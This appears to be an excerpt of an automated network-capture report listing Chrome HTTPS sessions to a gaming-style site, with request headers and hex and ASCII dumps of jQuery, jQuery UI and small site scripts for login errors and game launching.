2c 20
                                                      Data Ascii: o){Object.defineProperty(o,"__esModule",{value:!0});var a=function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n]);return e},r=function(e){var t=/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(e);return t?parseInt(t[1],16)+", "+parseInt(t[2],16)+",


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.44977620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC651OUTGET /plus/plugin/js/jquery-migrate.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:46 UTC317INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:46 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 7199
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1c1f"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:46 UTC3779INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 31 2e 32 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 33 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 6f 6c 65 3b 69 5b 6e 5d 7c 7c 28 69 5b 6e 5d 3d 21 30 2c 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 70 75 73 68 28 6e 29 2c 72
                                                      Data Ascii: /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r
                                                      2025-01-12 23:47:46 UTC3420INData Raw: 73 74 72 75 63 74 6f 72 3d 74 2c 74 2e 73 75 62 3d 74 68 69 73 2e 73 75 62 2c 74 2e 66 6e 2e 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 26 26 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 26 26 28 61 3d 74 28 61 29 29 2c 65 2e 66 6e 2e 69 6e 69 74 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 61 2c 6e 29 7d 2c 74 2e 66 6e 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 66 6e 3b 76 61 72 20 6e 3d 74 28 64 6f 63 75 6d 65 6e 74 29 3b 72 65 74 75 72 6e 20 72 28 22 6a 51 75 65 72 79 2e 73 75 62 28 29 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 29 2c 74 7d 2c 65 2e 61 6a 61 78 53 65 74 75 70 28 7b 63 6f 6e 76 65 72 74 65 72 73 3a 7b 22 74 65 78 74 20 6a 73 6f 6e 22 3a 65
                                                      Data Ascii: structor=t,t.sub=this.sub,t.fn.init=function(r,a){return a&&a instanceof e&&!(a instanceof t)&&(a=t(a)),e.fn.init.call(this,r,a,n)},t.fn.init.prototype=t.fn;var n=t(document);return r("jQuery.sub() is deprecated"),t},e.ajaxSetup({converters:{"text json":e


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.44977720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC646OUTGET /plus/plugin/js/jquery-ui.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:47 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:47 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 253669
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3dee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:47 UTC3776INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70 6c
                                                      Data Ascii: /*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-expl
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 2d 68 6f 76 65 72 22 29 2c 2d 31 21 3d 3d 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 2d 68 6f 76 65 72 22 29 7d 29 2e 6f 6e 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 69 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 74 2e 64 61 74 65 70 69 63 6b 65 72 2e 5f 69 73 44 69 73 61 62 6c 65 64 44 61 74
                                                      Data Ascii: this.className.indexOf("ui-datepicker-prev")&&t(this).removeClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&t(this).removeClass("ui-datepicker-next-hover")}).on("mouseover",i,o)}function o(){t.datepicker._isDisabledDat
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 74 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 74 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 74 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 74 2e 65 61 63 68 28 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 5f 72 65 6d 6f 76 65 43 6c 61 73
                                                      Data Ascii: create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:t.noop,_create:t.noop,_init:t.noop,destroy:function(){var e=this;this._destroy(),t.each(this.classesElementLookup,function(t,i){e._removeClas
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 61 72 20 6e 2c 6f 2c 61 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 69 66 28 73 3d 73 7c 7c 7b 7d 2c 69 3d 74 2e 45 76 65 6e 74 28 69 29 2c 69 2e 74 79 70 65 3d 28 65 3d 3d 3d 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 3f 65 3a 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 2b 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 69 2e 74 61 72 67 65 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 6f 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 29 66 6f 72 28 6e 20 69 6e 20 6f 29 6e 20 69 6e 20 69 7c 7c 28 69 5b 6e 5d 3d 6f 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 69 2c 73 29 2c 21 28 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 26 26 61 2e 61
                                                      Data Ascii: ar n,o,a=this.options[e];if(s=s||{},i=t.Event(i),i.type=(e===this.widgetEventPrefix?e:this.widgetEventPrefix+e).toLowerCase(),i.target=this.element[0],o=i.originalEvent)for(n in o)n in i||(i[n]=o[n]);return this.element.trigger(i,s),!(t.isFunction(a)&&a.a
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 63 7d 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 30 3e 69 3f 22 6c 65 66 74 22 3a 65 3e 30 3f 22 72 69 67 68 74 22 3a 22 63 65 6e 74 65 72 22 2c 76 65 72 74 69 63 61 6c 3a 30 3e 72 3f 22 74 6f 70 22 3a 73 3e 30 3f 22 62 6f 74 74 6f 6d 22 3a 22 6d 69 64 64 6c 65 22 7d 3b 6c 3e 70 26 26 70 3e 61 28 65 2b 69 29 26 26 28 75 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3d 22 63 65 6e 74 65 72 22 29 2c 63 3e 66 26 26 66 3e 61 28 73 2b 72 29 26 26 28 75 2e 76 65 72 74 69 63 61 6c 3d 22 6d 69 64 64 6c 65 22 29 2c 75 2e 69 6d 70 6f 72 74 61 6e 74 3d 6f 28 61 28 65 29 2c 61 28 69 29 29 3e 6f 28 61 28 73 29 2c 61 28 72 29 29 3f 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3a 22 76 65 72 74 69 63 61 6c 22 2c 6e 2e 75 73 69 6e 67 2e 63 61 6c 6c 28 74
                                                      Data Ascii: width:l,height:c},horizontal:0>i?"left":e>0?"right":"center",vertical:0>r?"top":s>0?"bottom":"middle"};l>p&&p>a(e+i)&&(u.horizontal="center"),c>f&&f>a(s+r)&&(u.vertical="middle"),u.important=o(a(e),a(i))>o(a(s),a(r))?"horizontal":"vertical",n.using.call(t
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 28 3f 3a 2c 5c 73 2a 28 5c 64 3f 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 29 3f 5c 29 2f 2c 73 70 61 63 65 3a 22 68 73 6c 61 22 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2f 31 30 30 2c 74 5b 33 5d 2f 31 30 30 2c 74 5b 34 5d 5d 7d 7d 5d 2c 6c 3d 74 2e 43 6f 6c 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 2e 43 6f 6c 6f 72 2e 66 6e 2e 70 61 72 73 65 28 65 2c 69 2c 73 2c 6e 29 7d 2c 63 3d 7b 72 67 62 61 3a 7b 70 72 6f 70 73 3a 7b 72 65 64 3a 7b
                                                      Data Ascii: *(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,space:"hsla",parse:function(t){return[t[1],t[2]/100,t[3]/100,t[4]]}}],l=t.Color=function(e,i,s,n){return new t.Color.fn.parse(e,i,s,n)},c={rgba:{props:{red:{
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 6e 28 65 29 7b 76 61 72 20 69 3d 65 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 28 69 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 74 2e 63 73 73 48 6f 6f 6b 73 5b 69 5d 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 2c 61 2c 72 3d 22 22 3b 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 21 3d 3d 6e 26 26 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 2e 74 79 70 65 28 6e 29 7c 7c 28 6f 3d 73 28 6e 29 29 29 29 7b 69 66 28 6e 3d 6c 28 6f 7c 7c 6e 29 2c 21 64 2e 72 67 62 61 26 26 31 21 3d 3d 6e 2e 5f 72 67 62 61 5b 33 5d 29 7b 66 6f 72 28 61 3d 22 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3d 3d 3d 69 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 65 3b 28 22 22 3d 3d 3d 72 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 72 29 26 26 61
                                                      Data Ascii: n(e){var i=e.split(" ");f(i,function(e,i){t.cssHooks[i]={set:function(e,n){var o,a,r="";if("transparent"!==n&&("string"!==t.type(n)||(o=s(n)))){if(n=l(o||n),!d.rgba&&1!==n._rgba[3]){for(a="backgroundColor"===i?e.parentNode:e;(""===r||"transparent"===r)&&a
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 6f 70 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 31 5d 29 7c 7c 30 2c 72 69 67 68 74 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 32 5d 3f 69 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 32 5d 29 2c 62 6f 74 74 6f 6d 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 33 5d 3f 73 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 33 5d 29 2c 6c 65 66 74 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 34 5d 29 7c 7c 30 7d 7d 74 2e 65 78 70 72 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 26 26 28 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 21 21 74 28 69 29 2e 64 61 74 61 28 64 29 7c 7c
                                                      Data Ascii: op:parseFloat(o[1])||0,right:"auto"===o[2]?i:parseFloat(o[2]),bottom:"auto"===o[3]?s:parseFloat(o[3]),left:parseFloat(o[4])||0}}t.expr&&t.expr.filters&&t.expr.filters.animated&&(t.expr.filters.animated=function(e){return function(i){return!!t(i).data(d)||
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 64 65 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 69 29 3a 28 72 2e 69 73 28 22 3a 68 69 64 64 65 6e 22 29 3f 22 68 69 64 65 22 3d 3d 3d 6c 3a 22 73 68 6f 77 22 3d 3d 3d 6c 29 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 61 29 7d 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6e 3d 74 2e 65 66 66 65 63 74 73 2e 65 66 66 65 63 74 5b 73 2e 65 66 66 65 63 74 5d 2c 6f 3d 6e 2e 6d 6f 64 65 2c 61 3d 73 2e 71 75 65 75 65 2c 72 3d 61 7c 7c 22 66 78 22 2c 68 3d 73 2e 63 6f 6d 70 6c 65 74 65 2c 6c 3d 73 2e 6d 6f 64 65 2c 63 3d 5b 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 73 3d 74 2e 65 66 66 65 63
                                                      Data Ascii: de?(r[l](),a()):n.call(r[0],s,i):(r.is(":hidden")?"hide"===l:"show"===l)?(r[l](),a()):n.call(r[0],s,a)}var s=e.apply(this,arguments),n=t.effects.effect[s.effect],o=n.mode,a=s.queue,r=a||"fx",h=s.complete,l=s.mode,c=[],u=function(e){var i=t(this),s=t.effec
                                                      2025-01-12 23:47:47 UTC4096INData Raw: 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 73 2c 6e 3d 7b 7d 2c 6f 3d 74 28 74 68 69 73 29 2c 61 3d 65 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 76 65 72 74 69 63 61 6c 22 2c 72 3d 22 62 6f 74 68 22 3d 3d 3d 61 2c 68 3d 72 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 61 2c 6c 3d 72 7c 7c 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 3b 73 3d 6f 2e 63 73 73 43 6c 69 70 28 29 2c 6e 2e 63 6c 69 70 3d 7b 74 6f 70 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 74 6f 70 2c 72 69 67 68 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c 65 66 74 29 2f 32 3a 73 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c
                                                      Data Ascii: ion(e,i){var s,n={},o=t(this),a=e.direction||"vertical",r="both"===a,h=r||"horizontal"===a,l=r||"vertical"===a;s=o.cssClip(),n.clip={top:l?(s.bottom-s.top)/2:s.top,right:h?(s.right-s.left)/2:s.right,bottom:l?(s.bottom-s.top)/2:s.bottom,left:h?(s.right-s.l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.44978020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:47 UTC637OUTGET /plus/js/custom/main.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:48 UTC316INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 1933
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-78d"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:48 UTC1933INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 70 6c 69 74 28 27 23 27 29 2e 70 6f 70 28 29 3d 3d 27 79 7a 6d 45 72 72 6f 72 27 20 26 26 20 73 77 61 6c 28 27 e9 aa 8c e8 af 81 e7 a0 81 e4 b8 8d e6 ad a3 e7 a1 ae ef bc 8c e8 af b7 e9 87 8d e6 96 b0 e7 99 bb e5 bd 95 27 29 2c 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 27 27 20 0a 20 20 20 20 7c 7c 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 70 6c 69 74 28 27 23 27 29 2e 70 6f 70 28 29 3d 3d 27 6c 6f 67 69 6e 45 72 72 6f 72 27 20 26 26 20 73 77 61 6c 28 27 e5 af 86 e7 a0 81 e9 94 99 e8 af af e6 88 96 e8 80 85 e6 98 af e8 b4 a6 e5 8f b7 e4 b8 8d e5 ad 98 e5 9c a8 27 29 2c 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 27 27 3b 0a 7d 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e
                                                      Data Ascii: $(function(){location.hash.split('#').pop()=='yzmError' && swal(''),location.hash='' || location.hash.split('#').pop()=='loginError' && swal(''),location.hash='';});function


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.44978120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:47 UTC643OUTGET /plus/js/unite/share_unite.js?ver=1661222874 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:48 UTC315INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:48 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 943
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 23 Aug 2022 02:47:54 GMT
                                                      ETag: "63043fda-3af"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:48 UTC943INData Raw: 76 61 72 20 6c 6f 67 69 6e 5f 66 6c 61 67 3b 0a 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 66 75 6e 63 74 69 6f 6e 20 70 6c 61 79 67 61 6d 65 5f 6d 6f 64 61 6c 28 74 79 70 65 2c 20 67 61 6d 65 69 64 2c 77 69 64 74 68 2c 68 65 69 67 68 74 29 7b 0a 09 09 69 66 28 74 79 70 65 20 3d 3d 20 27 74 72 79 27 29 20 74 79 70 65 20 3d 20 27 54 72 79 27 3b 0a 09 09 69 66 28 6c 6f 67 69 6e 5f 66 6c 61 67 20 7c 7c 20 74 79 70 65 3d 3d 27 54 72 79 27 29 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 27 2f 6c 6f 61 64 47 61 6d 65 2f 27 2b 74 79 70 65 2b 27 2f 27 2b 67 61 6d 65 69 64 2c 20 27 3f 27 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 20 27 6d 65 6e 75 62 61 72 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 73 63 72 6f 6c 6c 62 61 72 73 3d 79 65 73 2c 74 6f 70
                                                      Data Ascii: var login_flag;$(function(){function playgame_modal(type, gameid,width,height){if(type == 'try') type = 'Try';if(login_flag || type=='Try'){window.open('/loadGame/'+type+'/'+gameid, '?'+Math.random(), 'menubar=no,status=yes,scrollbars=yes,top


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.449779154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:47 UTC1178OUTGET /gdcode_1736725656 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
